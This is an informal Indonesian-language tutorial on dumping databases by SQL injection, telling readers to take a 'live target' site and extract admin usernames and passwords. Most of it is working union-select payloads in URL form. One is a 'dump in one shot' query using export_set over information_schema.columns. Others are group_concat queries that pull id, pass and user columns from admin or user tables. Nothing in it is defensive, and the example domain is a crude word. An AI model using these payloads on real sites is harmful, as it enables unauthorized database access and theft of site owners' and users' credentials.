SQLI DUMP

yoo whatshap sekarang kita belajar dump jika masih g ngerti tentang tutorial sql diatas mari kita ngedump bareng guys ok langsung ajah kita masuk materi

bahan
#hp
#kuota
#web dah di dios
#kesabaran


contoh gua punya laptarget

kontol.com/yoo.php?id=-1+union+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))4,5--+-

ok contoh kita punya live target ☝

langsung ae kita exploit nih

group_concat(id,0x3a,password,0x3a,name),4.5+from+admin--+

ok disitu ada password dan namr ye jika nanti seadai nya ada tabel admin berbentuk


admin::id
admin::pass
admin::select
admin::right

kita ambil kata belakang nya menjadi

group_concat(id,0x3a,pass disini kita ubah jadi pass aturan password,0x3a,id disini ubah menjadi id aturan tadi user ),

hasil jadi kek gini

group_concat(id,0x3a,pass,0x3a,id),

jangan senang dulu di belakang colomb kita haru tambahkan nama depan dari tabel
contoh
gua punya tabel depan nya

admin::
admin::

kita exploit nya dengan

+from+admin--+

jika disitu bukan admin tapi user gsnti from+user ya guys ='v

jadi exploit nya gini

php?id=-1+union+select+1,2,group_concat(id,0x3a,pass,0x3a,user),3,4+from+user--+-


#info

untuk mencari password dan user admin nya dengan kata

user::password
user::id
user::email

itu bisa kita tebas ☝

admin::password
admin::id
admin::email
admin::user

itu vuln ☝